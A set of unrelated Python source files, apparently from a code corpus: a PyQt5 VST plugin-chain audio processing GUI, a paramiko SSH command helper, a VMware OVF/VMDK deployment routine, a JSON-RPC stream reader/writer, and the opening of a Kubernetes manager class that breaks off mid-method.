self.button_remove_all_vst.clicked.connect(self._plugin_remove_all)
#
self.button_play_start.clicked.connect(self.play_start_click)
self.button_play_stop.clicked.connect(self.play_stop_click)
self.table_widget_files.cellClicked.connect(self.play_selected)
self.horizontal_slider_play.sliderPressed.connect(self.play_position_change_start)
self.horizontal_slider_play.sliderReleased.connect(self.play_position_change_end)
#
self.button_start_work.clicked.connect(self.start_work_click)
self.button_measurment.clicked.connect(self.start_work_click)
self.button_stop_work.clicked.connect(self.stop_work_click)
#
self.tool_button_metadata_image.clicked.connect(self._tag_metadata_image_select_click)
#
self.progress_signal.connect(self._progress_slot)
self.ready_signal.connect(self.end_work)
#
self.dockWidget.dockLocationChanged.connect(self._dock_window_lock_changed)
#
self.combo_box_logging_level.currentIndexChanged.connect(self.logging_level_changed)
self.combo_box_logging_level.setCurrentIndex(1)
self.button_clear_log.clicked.connect(self.textBrowser.clear)
# window color style
self.actionLightStyle.triggered.connect(self._ui_style_set)
self.actionDarkStyle.triggered.connect(self._ui_style_set)
self._put_start_message()
# -------------------------------------------------------------------------
def _ui_init(self):
# main ui from default
self.uic = uic.loadUi(os.path.dirname(__file__) + '/main.ui', self)
# create the animate graphics before loading the UI settings
self.anim = RectsAnimate(210, 25, QtGui.QColor.fromRgb(0, 32, 49))
self.anim_2 = RectsAnimate(210, 25, QtGui.QColor.fromRgb(0, 32, 49))
self.horizontalLayout_2.insertWidget(1, self.anim.window)
self.horizontalLayout_2.insertWidget(8, self.anim_2.window)
# load UI settings
self._ui_load_settings()
# avaible sound devices list
import sounddevice
devices_list = [d['name'] for d in sounddevice.query_devices() if d['max_output_channels'] > 1]
self.combo_box_sound_device.addItems(devices_list)
# show self main window
self.show()
# update scene background after show the window
self.anim.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
self.anim_2.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
# create and start the UI thread
self.nqueue = Queue()
t = threading.Thread(target=self.ui_thread)
t.daemon = True # thread dies when main thread exits.
t.start()
def _ui_load_settings(self):
# create UI settings instance
self.ui_settings = UI_Settings(os.path.dirname(__file__) + "/ui_settings.json")
# open and parse json UI settings file
settings = self.ui_settings.load()
# main window
window_size = settings.get("main_window_size", [600, 800])
self.resize(window_size[0], window_size[1])
# set main window position
qr = self.frameGeometry()
cp = QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
pos = settings.get("main_window_position", [qr.topLeft().x(), qr.topLeft().y()])
self.move(QtCore.QPoint(pos[0], pos[1]))
# global color style
self._ui_style_set(name=settings.get("theme_style", "Light"))
# dock widget (logging window)
self.dock_window_location = settings.get("dock_window_location", QtCore.Qt.BottomDockWidgetArea)
if self.dock_window_location == 0:
self.dockWidget.setFloating(True)
# dock window position
qr = self.dockWidget.frameGeometry()
cp = QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
pos = settings.get("dock_window_position", [qr.topLeft().x(), qr.topLeft().y()])
self.dockWidget.move(QtCore.QPoint(pos[0], pos[1]))
else:
            self.addDockWidget(self.dock_window_location, self.dockWidget)
# dock widget window size
window_size = settings.get("dock_window_size", [600, 300])
self.dockWidget.resize(window_size[0], window_size[1])
        self.resizeDocks([self.dockWidget], [window_size[0]], QtCore.Qt.Horizontal)
        self.resizeDocks([self.dockWidget], [window_size[1]], QtCore.Qt.Vertical)
if not settings.get("dock_window_visible", True):
self.dockWidget.close()
# tabs tables
columns_width = settings.get("table_files_columns", [500, 32, 100])
for i in range(len(columns_width)):
self.table_widget_files.setColumnWidth(i, columns_width[i])
# log message colors
self.textBrowser.text_colors = {
'ERROR': QtGui.QColor(255, 32, 32),
'WARNING': QtGui.QColor(220, 64, 64),
'INFO': QtGui.QColor(212, 224, 212),
'DEBUG': QtGui.QColor(212, 212, 64)
}
# opes/save filepaths
self._files_last_path = settings.get("files_last_path", "C://")
self._files_out_last_path = settings.get("files_out_last_path", "C://")
self.line_edit_out_folder.setText(self._files_out_last_path)
self._vst_last_path = settings.get("vst_last_path", "C://")
self._job_last_path = settings.get("job_last_path", "C://")
def _ui_save_settings(self):
# create settings dict
settings = {}
# main window
settings["main_window_size"] = [self.size().width(), self.size().height()]
settings["main_window_position"] = [self.geometry().x()-1, self.geometry().y()-31]
# global color style
settings["theme_style"] = self.style_name
# dock widget (logging window)
settings["dock_window_visible"] = self.dockWidget.isVisible()
settings["dock_window_location"] = self.dock_window_location
settings["dock_window_size"] = [self.dockWidget.size().width(), self.dockWidget.size().height()]
settings["dock_window_position"] = [self.dockWidget.geometry().x()-1, self.dockWidget.geometry().y()-31]
#
settings["table_files_columns"] = [
self.table_widget_files.columnWidth(0),
self.table_widget_files.columnWidth(1),
self.table_widget_files.columnWidth(2)
]
# open/save filepaths
settings["files_last_path"] = self._files_last_path
settings["files_out_last_path"] = self.line_edit_out_folder.text()
settings["vst_last_path"] = self._vst_last_path
settings["job_last_path"] = self._job_last_path
# save all settings
self.ui_settings.save(**settings)
def _ui_style_set(self, **kwargs):
if "name" in kwargs:
name = kwargs["name"]
else:
name = self.sender().objectName()
if 'Light' in name:
self.style_name = 'Light'
self.setStyleSheet("")
elif 'Dark' in name:
self.style_name = 'Dark'
self.setStyleSheet("background-color: rgb(76, 76, 76);\ncolor: rgb(255, 255, 255);")
self.anim.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
self.anim_2.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
def _dock_window_lock_changed(self, arg):
self.dock_window_location = arg
def _put_start_message(self):
import neil_vst
import neil_vst_gui.tag_write as tag_write
import sounddevice
import numpy
self._start_msg = [
'VST2.4 Host/Plugins chain worker GUI build %s beta.' % __version__,
'',
'Used:',
'[ py-neil-vst %s ]' % neil_vst.__version__,
'[ tag-write-util %s ]' % tag_write.__version__,
'[ soundfile %s ]' % soundfile.__version__,
'[ sounddevice %s ]' % sounddevice.__version__,
'[ numpy %s ]' % numpy.__version__,
'[ PyQt5 ]',
'',
            'The fully free and open-source project.',
'Multiprocessing, minimum memory footprint, fastest work and maximum quality.',
'',
'The contributors:',
'Vladislav Kamenev :: LeftRadio',
'Ildar Muhamadullin :: Muha',
'',
'Special big thanks to all who supported the project.',
'',
"Add input audio files, add needed VST2 plugins and it's settings, set out files metadata.",
'That all. Click the "START" and enjoy with the result ;)',
'',
'Wait start the working ...\n' ]
self.nqueue.put('start_message')
del(neil_vst)
del(tag_write)
# -------------------------------------------------------------------------
def _job_open(self):
json_file, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
'open files',
self._job_last_path,
'JSON (*.json)'
)
if not json_file:
return
self._job_last_path = QtCore.QFileInfo(json_file).path()
try:
self.job.load(json_file)
#
self._plugin_remove_all()
for v in self.job.settings["plugins_list"].values():
plugin = self._plugin_add(v["path"])
self.job.plugin_parameters_set(plugin, v["params"])
#
normalize = self.job.settings["normalize"]
self.check_box_normalize_enable.setChecked(normalize["enable"]),
self.line_edit_normalize_rms_level.setText( str(normalize["target_rms"]) )
self.line_edit_normalize_error_db.setText( str(normalize["error_db"]) )
#
self.logger.info("JOB loaded from '%s' [ SUCCESS ]" % os.path.basename(json_file))
title = self.windowTitle()
self.setWindowTitle("%s [ %s ]" % (title.split("[")[0], os.path.basename(json_file)))
except Exception as e:
self.logger.error("JOB load from '%s' [ ERROR ], check job file for correct sctructure" % os.path.basename(json_file))
self.logger.debug(str(e))
def _job_save(self):
json_file, _ = QtWidgets.QFileDialog.getSaveFileName(
self,
'save file',
self._job_last_path,
'JSON (*.json)'
)
if not json_file:
return
try:
self.job.update(
filepath=json_file,
normilize_params=self._normilize_settings()
)
self.logger.info("JOB saved to - %s [ SUCCESS ], set DEBUG level for details" % json_file)
self.logger.debug("filepath - %s, normilize_params - %s" % (json_file, self._normilize_settings()))
except Exception as e:
self.logger.error("JOB save to - %s [ ERROR ], set DEBUG level for details" % json_file)
self.logger.debug(str(e))
# -------------------------------------------------------------------------
def _files_open_click(self):
in_files = QtWidgets.QFileDialog.getOpenFileNames(
self,
'open files',
self._files_last_path,
            'Audio (*.aiff *.flac *.wav *.ogg)'
)
if not len(in_files[0]):
return
self._files_last_path = QtCore.QFileInfo(in_files[0][0]).path()
self.job.set_in_files(in_files[0])
self._files_update_table(self.job.in_files)
def _files_update_table(self, filelist):
table = self.table_widget_files
self._files_clear_table()
for f in sorted(filelist ):
if f in [table.item(r, 0).text() for r in range(table.rowCount())]:
continue
#
table.setRowCount(table.rowCount() + 1)
# pathname
table.setItem(table.rowCount()-1, 0, QtWidgets.QTableWidgetItem(os.path.basename(f)))
# size
item = QtWidgets.QTableWidgetItem("%.2f MB" % (os.stat(f).st_size/(1024*1024)))
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(table.rowCount()-1, 1, item)
# description
chs = ["Mono", "Stereo", "", "4 CH"]
load_file = soundfile.SoundFile(f, mode='r', closefd=True)
decs_text = "%s kHz %s %s" % (load_file.samplerate/1000, chs[load_file.channels-1], load_file.subtype)
item = QtWidgets.QTableWidgetItem(decs_text)
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(table.rowCount()-1, 2, item)
    def _files_remove_selected(self):
        # remove rows bottom-up so the remaining row indexes stay valid
        rows = sorted({i.row() for i in self.table_widget_files.selectedIndexes()}, reverse=True)
        if not rows:
            return
        for row in rows:
            self.job.file_remove(self.table_widget_files.item(row, 0).text())
            self.table_widget_files.removeRow(row)
def _files_clear_table(self):
while self.table_widget_files.rowCount():
self.table_widget_files.removeRow(0)
def _files_remove_all(self):
self._files_clear_table()
self.job.files_remove_all()
def _files_out_folder_click(self):
dir_name = QtWidgets.QFileDialog.getExistingDirectory(
self,
"Open Directory",
self._files_out_last_path,
QtWidgets.QFileDialog.ShowDirsOnly | QtWidgets.QFileDialog.DontResolveSymlinks
)
self.line_edit_out_folder.setText(dir_name)
# -------------------------------------------------------------------------
def play_start_click(self):
self._play_position_change_start_flag = False
self.play_start_thread()
def play_start_thread(self, position=0):
t = threading.Thread(target=self.play_start, args=(position,))
t.daemon = True # thread dies when main thread exits.
t.start()
def play_start(self, position=0):
file_index = self.table_widget_files.currentRow()
if file_index < 0:
return
self.button_play_start.setEnabled(False)
self.button_play_stop.setEnabled(True)
self.table_widget_files.setEnabled(False)
self.play_start_pos_slider = self.horizontal_slider_play.value()
play_start_pos = self.play_start_pos_slider / self.horizontal_slider_play.maximum()
try:
self.play_chain.start(
filename=self.job.in_files[file_index],
audio_device=self.combo_box_sound_device.currentText(),
channels=2,
vst_host=self.main_worker.host(),
vst_plugins_chain=self.job.vst_plugins_chain,
start=play_start_pos
)
except Exception as e:
self.logger.error(str(e))
self.play_chain.stop()
def play_stop_click(self):
self.play_chain.stop()
def play_stop_slot(self):
self.button_play_start.setEnabled(True)
self.button_play_stop.setEnabled(False)
self.table_widget_files.setEnabled(True)
if self.horizontal_slider_play.value() >= self.horizontal_slider_play.maximum()-1:
self.horizontal_slider_play.setValue(self.horizontal_slider_play.minimum())
def play_selected(self, row, column):
if row < 0:
            self.button_play_start.setEnabled(False)
return
self.group_box_play.setTitle(self.group_box_play.title().split(" - ")[0] + " - [ %s ]" % os.path.basename(self.job.in_files[row]))
self.button_play_start.setEnabled(True)
self.horizontal_slider_play.setEnabled(True)
def play_progress_update(self, procent_value):
if self.play_chain.is_active() and not self._play_position_change_start_flag:
slider_val = int(self.play_start_pos_slider + procent_value*self.horizontal_slider_play.maximum())
self.horizontal_slider_play.setValue(slider_val)
# print(self.horizontal_slider_play.value())
def play_position_change_start(self):
self._play_position_change_start_flag = True
def play_position_change_end(self):
if self.play_chain.is_active():
self.play_chain.stop()
sleep(0.25)
self.play_start_thread()
self._play_position_change_start_flag = False
# -------------------------------------------------------------------------
def _normilize_settings(self):
return {
"enable": self.check_box_normalize_enable.isChecked(),
"target_rms": float(self.line_edit_normalize_rms_level.text()),
"error_db": float(self.line_edit_normalize_error_db.text())
}
def _plugin_add(self, pathname):
try:
plugin = self.main_worker.vst_dll_load(pathname, self.logger)
self.logger.debug(plugin.info())
except Exception as e:
self.logger.error('[ ERROR ] while load "%s"' % os.path.basename(pathname))
self.logger.debug(str(e))
return
self.job.vst_add_to_chain(plugin)
#
table = self.table_widget_processes
#
index = table.rowCount()
table.setRowCount(index+1)
#
item = QtWidgets.QTableWidgetItem(plugin.name)
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(index, 0, item)
#
self.logger.info('Add VST - "%s"' % plugin.name)
#
return plugin
def _plugin_add_click(self):
vst_dll, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
'open VST plugin file',
self._vst_last_path,
'VST dll (*.dll)'
)
if not vst_dll:
return
self._vst_last_path = QtCore.QFileInfo(vst_dll).path()
self._plugin_add(vst_dll)
def _plugin_change_click(self):
index = self.table_widget_processes.currentRow()
w = VSTPluginWindow(self.job.vst_plugins_chain[index], parent=self)
w.show()
def _plugin_up_click(self):
#
table = self.table_widget_processes
select_row = table.currentRow()
if select_row <= 0:
return
self.job.vst_swap_in_chain(select_row, select_row - 1)
select_item = table.takeItem(select_row, 0)
change_item = table.takeItem(select_row - 1, 0)
table.setItem(select_row - 1, 0, select_item)
table.setItem(select_row, 0, change_item)
table.setCurrentCell(select_row - 1, 0, QtCore.QItemSelectionModel.SelectCurrent)
def _plugin_down_click(self):
#
table = self.table_widget_processes
select_row = table.currentRow()
if select_row >= table.rowCount()-1:
return
self.job.vst_swap_in_chain(select_row, select_row + 1)
select_item = table.takeItem(select_row, 0)
change_item = table.takeItem(select_row + 1, 0)
table.setItem(select_row + 1, 0, select_item)
table.setItem(select_row, 0, change_item)
table.setCurrentCell(select_row + 1, 0, QtCore.QItemSelectionModel.SelectCurrent)
def _plugin_remove_selected_click(self):
index = self.table_widget_processes.currentRow()
if index < 0 or index > self.table_widget_processes.rowCount()-1:
return
self.table_widget_processes.removeRow(index)
self.job.vst_remove_from_chain(index)
def _plugin_remove_all(self):
while self.table_widget_processes.rowCount():
self.table_widget_processes.removeRow(0)
self.job.vst_remove_all()
# -------------------------------------------------------------------------
def _tag_data(self):
return (
self.line_edit_metadata_author.text(),
self.line_edit_metadata_artist.text(),
self.line_edit_metadata_sound_designer.text(),
self.line_edit_metadata_album_book.text(),
self.line_edit_metadata_genre.text(),
self.line_edit_metadata_year.text(),
self.text_edit_metadata_description.toPlainText(),
self.line_edit_metadata_image.text()
)
def _tag_metadata_image_select_click(self):
image_file, _ = QtWidgets.QFileDialog.getOpenFileNames(
self,
'Open File',
self._files_last_path,
'Images (*.bmp *.png *.jpg)'
)
if not len(image_file):
return
self.line_edit_metadata_image.setText(image_file[0])
try:
pixmap = QtGui.QPixmap(image_file[0])
coeff = pixmap.width() / 450
self.label_metadata_image_show.setMinimumWidth(450)
self.label_metadata_image_show.setMaximumWidth(450)
self.label_metadata_image_show.setMinimumHeight(int(pixmap.height() / coeff))
self.label_metadata_image_show.setMaximumHeight(int(pixmap.height() / coeff))
self.label_metadata_image_show.setPixmap(pixmap)
except Exception as e:
self.logger.error("Error on draw the selected image [%s]" % str(e))
# -------------------------------------------------------------------------
def ui_thread(self):
""" The worker thread pulls an item from the queue and processes it """
while True:
item = self.nqueue.get()
with threading.Lock():
if item == 'start_message':
import random
for m in self._start_msg:
self.logger.info(m)
sleep(random.uniform(0.1, 0.2))
if item == 'run':
start = time()
while any(w.is_alive() for w in self.main_worker.processes):
sleep(0.01)
if not self.main_worker.terminate_work:
import datetime
sleep(0.5)
self.logger.info("[ END ] - Elapsed time: [ %s ]" % str(datetime.timedelta(seconds=(time()-(start+0.5)))).split(".")[0] )
self.ready_signal.emit()
if item == 'play':
self._play_start()
self.nqueue.task_done()
def start_work_click(self):
""" START button click slot """
sender_name = self.sender()
if not self.button_start_work.isEnabled() or not len(self.job.in_files):
return
self.button_start_work.setEnabled(False)
self.button_measurment.setEnabled(False)
self.button_stop_work.setEnabled(True)
self.tab_input_files.setEnabled(False)
self.tab_vst_process.setEnabled(False)
self.tab_metadata.setEnabled(False)
# set animation is fastest
self.anim.timer.setInterval(750)
# block until all tasks are done
self.nqueue.join()
# update all job parameters
self.job.update(
normilize_params=self._normilize_settings(),
out_folder=self.line_edit_out_folder.text(),
tag_data=self._tag_data()
)
try:
vst_buffer_size = int(self.line_edit_buffer_size_bytes.text())
except Exception as e:
self.logger.warning(
"VST buffer size is incorrect!"
"Please set numberic value in range: [ 1024..65536 ] bytes\n"
"Set the default buffer size: [ 1024 ]"
)
vst_buffer_size = 1024
# start the work
self.main_worker.start(
pipe=self.child_pipe,
job=self.job,
meas=("MEAS" in sender_name.text()),
vst_buffer_size=vst_buffer_size,
log_level=self.workers_logging_level
)
# wait while all processes are done
self.nqueue.put('run')
def stop_work_click(self):
if not self.button_stop_work.isEnabled():
return
self.main_worker.stop()
self.logger.warning("[TERMINATED]",)
self.end_work()
def end_work(self):
self.button_start_work.setEnabled(True)
self.button_measurment.setEnabled(True)
self.button_stop_work.setEnabled(False)
self.tab_input_files.setEnabled(True)
self.tab_vst_process.setEnabled(True)
self.tab_metadata.setEnabled(True)
self.anim.timer.setInterval(2000)
old_progr = 0
def _progress_slot(self, progress):
if (progress - self.old_progr) > 20:
self.anim.timer.setInterval(600 - (progress * 5))
self.old_progr = progress
elif not progress:
self.old_progr = progress
# -------------------------------------------------------------------------
def _logger_init(self):
#
self.extra = {'ThreadName': current_process().name }
self.logger = logging.getLogger(current_process().name)
self.logger.setLevel(logging.DEBUG)
self.handler = MainLogHandler(self.logging_signal)
self.handler.setFormatter(logging.Formatter(
fmt='%(name)s - %(levelname)s - %(message)s', datefmt='%H:%M:%S'))
self.logger.addHandler(self.handler)
self.logging_signal.connect(self.text_browser_message)
# Create the logging communication pipes and emiter for all work processes
self.mother_pipe, self.child_pipe = Pipe()
self.log_emitter = ProcessLogEmitter(self.mother_pipe)
self.log_emitter.start()
self.log_emitter.ui_data_available.connect(self.text_browser_message)
def logging_level_changed(self, level_index):
levels = [ logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR ]
self.handler.setLevel(levels[level_index])
self.workers_logging_level = levels[level_index]
self.play_chain.log_level = levels[level_index]
def _mt_update_log(self, text):
""" Add text to the lineedit box. """
self.logger.info(text)
def text_browser_message(self, msg, level):
text_cursor = self.textBrowser.textCursor()
text_cursor.movePosition(QtGui.QTextCursor.End)
self.textBrowser.setTextCursor(text_cursor)
color = self.textBrowser.text_colors.get(level, self.textBrowser.text_colors['DEBUG'])
self.textBrowser.setTextColor(color)
self.textBrowser.insertPlainText("%s \r\n" % msg)
sb = self.textBrowser.verticalScrollBar()
sb.setValue(sb.maximum())
self.textBrowser.repaint()
def _log_clear(self):
self.textBrowser.clear()
# -------------------------------------------------------------------------
def _close_request(self):
self.close()
def closeEvent(self, event):
reply = QtWidgets.QMessageBox.question(
self,
'QUIT',
"Are you sure you want to exit the program?",
QtWidgets.QMessageBox.Yes,
QtWidgets.QMessageBox.No
)
if reply == QtWidgets.QMessageBox.No:
event.ignore()
return
# save GUI state
self._ui_save_settings()
event.accept()
def process_events(self):
QtWidgets.QApplication.processEvents()
def main():
freeze_support()
app = QtWidgets.QApplication(sys.argv)
QtWidgets.QApplication.setStyle(QtWidgets.QStyleFactory.create('Fusion'))
ex = neil_vst_gui_window()
sys.exit(app.exec_())
# program start here
if __name__ == '__main__':
main()
|
sshScripts.py
|
### This script is used to send commands to RPi over an SSH connection.
# Initiate connection by instantiating the class as connection = ssh(serverIP,sshUsername,sshPassword)
# Then send commands with connection.sendCommand('type_command_here')
from paramiko import client
from paramiko.ssh_exception import SSHException
from threading import Thread
class ssh:
# This class was taken from:
# https://daanlenaerts.com/blog/2016/01/02/python-and-ssh-sending-commands-over-ssh-using-paramiko/
# 09/12/16
client = None
def __init__(self, address, username, password):
self.address = address
self.client = client.SSHClient()
self.client.set_missing_host_key_policy(client.AutoAddPolicy())
self.client.connect(address, username=username, password=password, look_for_keys=False)
self.Ts_sendCommand = []
def sendCommand(self, command, timeout=5, verbose=True):
if(self.client):
try:
stdin, stdout, stderr = self.client.exec_command(command, timeout=timeout)
if verbose:
while not stdout.channel.exit_status_ready():
# Print data when available
if stdout.channel.recv_ready():
alldata = stdout.channel.recv(1024)
prevdata = b"1"
while prevdata:
prevdata = stdout.channel.recv(1024)
alldata += prevdata
print(str(alldata))
except SSHException as e:
if e.__str__() == 'Timeout opening channel.':
print('ERROR: Command timeout!' + '\nFailed to send command: ' + command + ' | To: ' + self.address)
elif e.__str__() == 'SSH session not active':
print('ERROR: Connection lost!' + '\nFailed to send command: ' + command + ' | To: ' + self.address)
else:
raise e
else:
print("Connection not opened.")
def sendCommand_threading(self, command, timeout=5, verbose=True):
T = Thread(target=self.sendCommand, args=(command, timeout, verbose))
T.start()
self.Ts_sendCommand.append(T)
def testConnection(self, timeout=5):
'''
Returns True if connection is active. False if connection inactive until timeout or session inactive.
'''
if(self.client):
try:
stdin, stdout, stderr = self.client.exec_command('ls', timeout=timeout)
return True
except SSHException as e:
if e.__str__() == 'Timeout opening channel.':
return False
elif e.__str__() == 'SSH session not active':
return False
else:
raise e
else:
return False
def disconnect(self, force=False):
if(self.client):
if not force and len(self.Ts_sendCommand) > 0:
for T in self.Ts_sendCommand:
T.join()
self.client.close()
else:
print("Connection not opened.")
|
ovf.py
|
# Copyright (c) 2019 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from os import path
# from sys import exit
from threading import Thread
from time import sleep
# from argparse import ArgumentParser
# from getpass import getpass
import requests
# from pyVim import connect
from pyVmomi import vim
# from pyVmomi.VmomiSupport import long
from vio.vsphere import utils
def get_ovf_descriptor(ovf_path):
"""
Read in the OVF descriptor.
"""
if path.exists(ovf_path):
with open(ovf_path, 'r') as f:
try:
ovfd = f.read()
return ovfd
except Exception as ex:
raise Exception("Could not read file %s: %s" % (
ovf_path, str(ex)))
def get_obj_in_list(obj_name, obj_list):
    """
    Gets an object out of a list (obj_list) whose name matches obj_name.
    """
    for o in obj_list:
        if o.name == obj_name:
            return o
    raise Exception("Unable to find object by the name of %s in list: %s" %
                    (obj_name, [o.name for o in obj_list]))
def get_objects(si, datacenter_name=None, datastore_name=None,
cluster_name=None):
"""
Return a dict containing the necessary objects for deployment.
"""
# Get datacenter object.
datacenter_list = si.content.rootFolder.childEntity
if datacenter_name:
datacenter_obj = get_obj_in_list(datacenter_name, datacenter_list)
else:
datacenter_obj = datacenter_list[0]
# Get datastore object.
datastore_list = datacenter_obj.datastoreFolder.childEntity
if datastore_name:
datastore_obj = get_obj_in_list(datastore_name, datastore_list)
elif len(datastore_list) > 0:
datastore_obj = datastore_list[0]
else:
print("No datastores found in DC (%s)." % datacenter_obj.name)
# Get cluster object.
cluster_list = datacenter_obj.hostFolder.childEntity
if cluster_name:
cluster_obj = get_obj_in_list(cluster_name, cluster_list)
elif len(cluster_list) > 0:
cluster_obj = cluster_list[0]
else:
print("No clusters found in DC (%s)." % datacenter_obj.name)
# Generate resource pool.
resource_pool_obj = cluster_obj.resourcePool
return {"datacenter": datacenter_obj,
"datastore": datastore_obj,
"resource pool": resource_pool_obj}
def keep_lease_alive(lease):
"""
Keeps the lease alive while POSTing the VMDK.
"""
while(True):
sleep(5)
try:
# Choosing arbitrary percentage to keep the lease alive.
lease.HttpNfcLeaseProgress(50)
if (lease.state == vim.HttpNfcLease.State.done):
return
# If the lease is released, we get an exception.
# Returning to kill the thread.
except Exception:
return
def deploy_ovf(si, vmdk_path, ovf_path, datacenter, cluster, datastore):
default_ovf = False
if ovf_path is None:
default_ovf = True
cpath = path.dirname(path.realpath(__file__))
ovf_path = cpath + "/templates/template.ovf"
# import ipdb; ipdb.set_trace()
vmdk_meta = utils.vmdk_metadata(vmdk_path)
# vmdk_size = path.getsize(vmdk_path)
ovfd = get_ovf_descriptor(ovf_path)
objs = get_objects(si, datacenter, datastore, cluster)
manager = si.content.ovfManager
spec_params = vim.OvfManager.CreateImportSpecParams()
print("Creating import ovf spec")
import_spec = manager.CreateImportSpec(ovfd,
objs["resource pool"],
objs["datastore"],
spec_params)
if default_ovf:
import_spec.importSpec.configSpec.deviceChange[
1].device.capacityInKB = int(vmdk_meta['size'])
lease = objs["resource pool"].ImportVApp(import_spec.importSpec,
objs["datacenter"].vmFolder)
while(True):
if (lease.state == vim.HttpNfcLease.State.ready):
# Assuming single VMDK.
# url = lease.info.deviceUrl[0].url.replace('*', host)
url = lease.info.deviceUrl[0].url
            # Spawn a keep-alive thread to keep the lease active while POSTing
            # the VMDK.
keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
keepalive_thread.start()
print("Uploading %s to %s" % (vmdk_path, url))
# POST the VMDK to the host via curl. Requests library would work
# too.
# curl_cmd = (
# "curl -Ss -X POST --insecure -T %s -H 'Content-Type: \
# application/x-vnd.vmware-streamVmdk' %s" %
# (vmdk_path, url))
# system(curl_cmd)
headers = {'Content-Type': 'application/x-vnd.vmware-streamVmdk'}
client_cookie = si._stub.cookie
cookie_name = client_cookie.split("=", 1)[0]
cookie_value = client_cookie.split("=", 1)[1].split(";", 1)[0]
cookie_path = client_cookie.split("=", 1)[1].split(
";", 1)[1].split(";", 1)[0].lstrip()
cookie_text = " " + cookie_value + "; $" + cookie_path
# Make a cookie
cookie = dict()
cookie[cookie_name] = cookie_text
with open(vmdk_path, "rb") as f:
resp = requests.post(url,
# params=params,
data=f,
# files={"file": f},
headers=headers,
cookies=cookie,
verify=False)
print("Upload results %s: %s" % (
resp.status_code, resp.content))
lease.HttpNfcLeaseComplete()
keepalive_thread.join()
return
elif (lease.state == vim.HttpNfcLease.State.error):
raise Exception("Lease error: " + lease.error.msg)
|
jsonrpc_stream.py
|
# pyre-strict
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from queue import Empty, Queue
from threading import Thread
from typing import BinaryIO, Optional
from utils import Json
class JsonRpcStreamReader:
def __init__(self, stream: BinaryIO) -> None:
self.stream = stream
        # pyre-fixme[11]: Annotation `Json` is not defined as a type.
self.queue: Queue[Json] = Queue()
# daemon ensures the reading thread will get cleaned up when
# the main program exits. no need to explicitly manage it.
self.read_thread = Thread(target=self._async_read_loop, daemon=True)
self.read_thread.start()
def read(self, timeout_seconds: float) -> Optional[Json]:
try:
return self.queue.get(block=True, timeout=timeout_seconds)
except Empty:
return None
def _async_read_loop(self) -> None:
while True:
try:
self.queue.put(json.loads(self._read_payload()))
except ValueError:
break
except IndexError:
break
def _read_content_length(self) -> int:
# read the 'Content-Length:' line and absorb the newline
# after it
length_line = self.stream.readline().decode()
self.stream.read(len("\r\n"))
# get the content length as an integer for the
# rest of the package
parts = length_line.split(":", 1)
return int(parts[1].strip())
def _read_content(self, length: int) -> bytes:
return self.stream.read(length)
def _read_payload(self) -> bytes:
length = self._read_content_length()
return self._read_content(length)
class JsonRpcStreamWriter:
def __init__(self, stream: BinaryIO) -> None:
self.stream = stream
def write(self, json_data: Json) -> None:
serialized = json.dumps(json_data)
content_length = len(serialized)
payload = "Content-Length: {c}\n\n{s}".format(c=content_length, s=serialized)
self._write_string(payload)
def _write_string(self, s: str) -> None:
self.stream.write(s.encode())
self.stream.flush()
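# Rough usage sketch (assumptions: an in-memory io.BytesIO stream and standard
# "Content-Length" framing, i.e. a header line, a blank line, then exactly that
# many bytes of JSON -- which is what _read_content_length() above consumes):
#
#   import io
#   body = b'{"jsonrpc": "2.0", "id": 1, "method": "ping"}'
#   framed = b"Content-Length: %d\r\n\r\n" % len(body) + body
#   reader = JsonRpcStreamReader(io.BytesIO(framed))
#   message = reader.read(timeout_seconds=1.0)  # parsed dict, or None on timeout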
|
kubernetes.py
|
import os
import threading
import time
import kubernetes as k8s
from urllib3.exceptions import ProtocolError
from villas.controller.components.manager import Manager
from villas.controller.components.simulators.kubernetes import KubernetesJob
def _match(a, b):
    """Return True if the two names are equal or one contains the other."""
    if a == b:
        return True
    elif len(a) < len(b):
        return a in b
    elif len(b) < len(a):
        return b in a
    return False
class KubernetesManager(Manager):
def __init__(self, **args):
super().__init__(**args)
self.thread_stop = threading.Event()
self.pod_watcher_thread = threading.Thread(
target=self._run_pod_watcher)
self.job_watcher_thread = threading.Thread(
target=self._run_job_watcher)
self.event_watcher_thread = threading.Thread(
target=self._run_event_watcher)
if os.environ.get('KUBECONFIG'):
k8s.config.load_kube_config()
else:
k8s.config.load_incluster_config()
self.namespace = args.get('namespace', 'default')
self.my_namespace = os.environ.get('NAMESPACE')
self.my_pod_name = os.environ.get('POD_NAME')
self.my_pod_uid = os.environ.get('POD_UID')
self._check_namespace(self.namespace)
# self.pod_watcher_thread.start()
# self.job_watcher_thread.start()
        self.event_watcher_thread.daemon = True
self.event_watcher_thread.start()
def _check_namespace(self, ns):
c = k8s.client.CoreV1Api()
namespaces = c.list_namespace()
for namespace in namespaces.items:
if namespace.metadata.name == ns:
return
raise RuntimeError(f'Namespace {ns} does not exist')
def _run_pod_watcher(self):
w = k8s.watch.Watch()
c = k8s.client.CoreV1Api()
for sts in w.stream(c.list_namespaced_pod,
namespace=self.namespace):
stso = sts.get('object')
typ = sts.get('type')
self.logger.info('%s Pod: %s', typ, stso.metadata.name)
def _run_job_watcher(self):
w = k8s.watch.Watch()
b = k8s.client.BatchV1Api()
for sts in w.stream(b.list_namespaced_job,
namespace=self.namespace):
stso = sts.get('object')
typ = sts.get('type')
self.logger.info('%s Job: %s', typ, stso.metadata.name)
def _run_event_watcher(self):
while not self.thread_stop.is_set():
w = k8s.watch.Watch()
